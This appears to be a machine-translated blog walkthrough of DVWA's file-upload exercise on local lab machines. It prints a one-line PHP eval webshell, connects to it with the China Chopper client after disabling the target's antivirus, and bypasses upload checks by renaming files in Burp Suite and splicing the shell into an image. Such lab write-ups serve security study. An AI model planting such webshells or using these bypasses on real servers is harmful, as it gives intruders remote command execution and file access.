当前位置:网站首页>DVWA exercise 05 file upload file upload
DVWA exercise 05 file upload file upload
2022-07-06 14:47:00 【Fuki is on the way】
Purpose IP:192.168.142.133
Local IP:192.168.142.134
1.Security Level:Low
The code is as follows
The server did not check and process the uploaded files . I try to create a new one locally muma.php, Write a word Trojan :<?php @eval($_POST['test']);?>
( Pay attention to punctuation in English )
Upload files to dvwa
Return the path where the file was uploaded !
Go to the corresponding folder to find the file
Before connecting with a Chinese kitchen knife , There is a question . The new version of the phpstudy By default php7, Chinese kitchen knife connection failed , Switch to php5 That's it .( After changing the version , my dvwa Something went wrong , I had to repack it )
Open the Chinese kitchen knife , Right click , add to .
Address to fill in http://192.168.142.133/dvwa/hackable/uploads/muma.php
On the right is a sentence in single quotation marks
Script type selection PHP(Eval)
Right click , Virtual terminal
Input ipconfig, Check address information , But the display failed .
The target virtual machine is installed 360, A warning window will pop up when entering the system command , Default block .
hold 360 Turn it off and try again , Command executed successfully !
You can also use the file management function , View the files of the entire virtual machine , At the same time, it can upload / download / Delete and other operations .
2.Security Level:Medium
Key source code :
The upload file type restricted here is image, extension jpeg or png, And the size is smaller than 100000 byte . We can use burpsuite Modify after interception , Bypass restrictions .
Local muma.php Rename it to muma2.png
Click upload ,Burpsuite Intercept the packet , Put the filename muma2.png It is amended as follows muma2.php, Then release .
Go to the target virtual machine to view muma2.php Successfully uploaded !
3.Security Level:High
The key source code is as follows :
strrpos(string,find,start) Function return string find In another string string The last place in , If no string is found, return false, Optional parameters start Specify where to start the search .
getimagesize(string filename) The function will read the file header , Returns the length of the picture 、 Wide and so on , If there is no relevant picture file header , The function will report an error . You can see ,High Level code reads the last in the file name ”.” String after , Expect to restrict file types by file names , Therefore, the upload file name must be in the form of ”*.jpg”、”*.jpeg” 、”*.png” One of . meanwhile ,getimagesize The function also limits that the file header of the uploaded file must be of image type .
Splice a picture with the previous sentence Trojan horse file , Form a new picture .
Open the picture with Notepad , You can see a sentence at the end of the Trojan horse .
Upload succeeded , But it can't be connected with a kitchen knife . I didn't think of a solution for the time being .
Reference resources :https://www.cnblogs.com/N0r4h/p/12257848.html
https://blog.csdn.net/weixin_39190897/article/details/86772765
边栏推荐
- Function: find 1-1/2+1/3-1/4+1/5-1/6+1/7-... +1/n
- Statistics 8th Edition Jia Junping Chapter 2 after class exercises and answer summary
- "If life is just like the first sight" -- risc-v
- [pointer] find the largest string
- [pointer] find the value of the largest element in the two-dimensional array
- [pointer] octal to decimal
- Circular queue (C language)
- Statistics 8th Edition Jia Junping Chapter IX summary of knowledge points of classified data analysis and answers to exercises after class
- JDBC read this article is enough
- Statistics, 8th Edition, Jia Junping, Chapter 11 summary of knowledge points of univariate linear regression and answers to exercises after class
猜你喜欢
Uibutton status exploration and customization
Realize applet payment function with applet cloud development (including source code)
Es full text index
1. Payment system
内网渗透之内网信息收集(三)
Statistics 8th Edition Jia Junping Chapter IX summary of knowledge points of classified data analysis and answers to exercises after class
线程的实现方式总结
《统计学》第八版贾俊平第八章假设检验知识点总结及课后习题答案
How to earn the first pot of gold in CSDN (we are all creators)
Four methods of exchanging the values of a and B
随机推荐
Statistics 8th Edition Jia Junping Chapter 3 after class exercises and answer summary
MySQL中什么是索引?常用的索引有哪些种类?索引在什么情况下会失效?
Solutions to common problems in database development such as MySQL
Statistics 8th Edition Jia Junping Chapter 2 after class exercises and answer summary
Login the system in the background, connect the database with JDBC, and do small case exercises
《统计学》第八版贾俊平第十四章指数知识点总结及课后习题答案
Get started with Matplotlib drawing
Binary search tree concept
Markdown font color editing teaching
JDBC看这篇就够了
【指针】删除字符串s中的所有空格
The common methods of servlet context, session and request objects and the scope of storing data in servlet.
How does SQLite count the data that meets another condition under the data that has been classified once
Function: calculates the number of uppercase letters in a string
[pointer] counts the number of times one string appears in another string
Fundamentals of digital circuit (V) arithmetic operation circuit
Lintcode logo queries the two nearest saplings
《统计学》第八版贾俊平第三章课后习题及答案总结
Numpy Quick Start Guide
Load balancing ribbon of microservices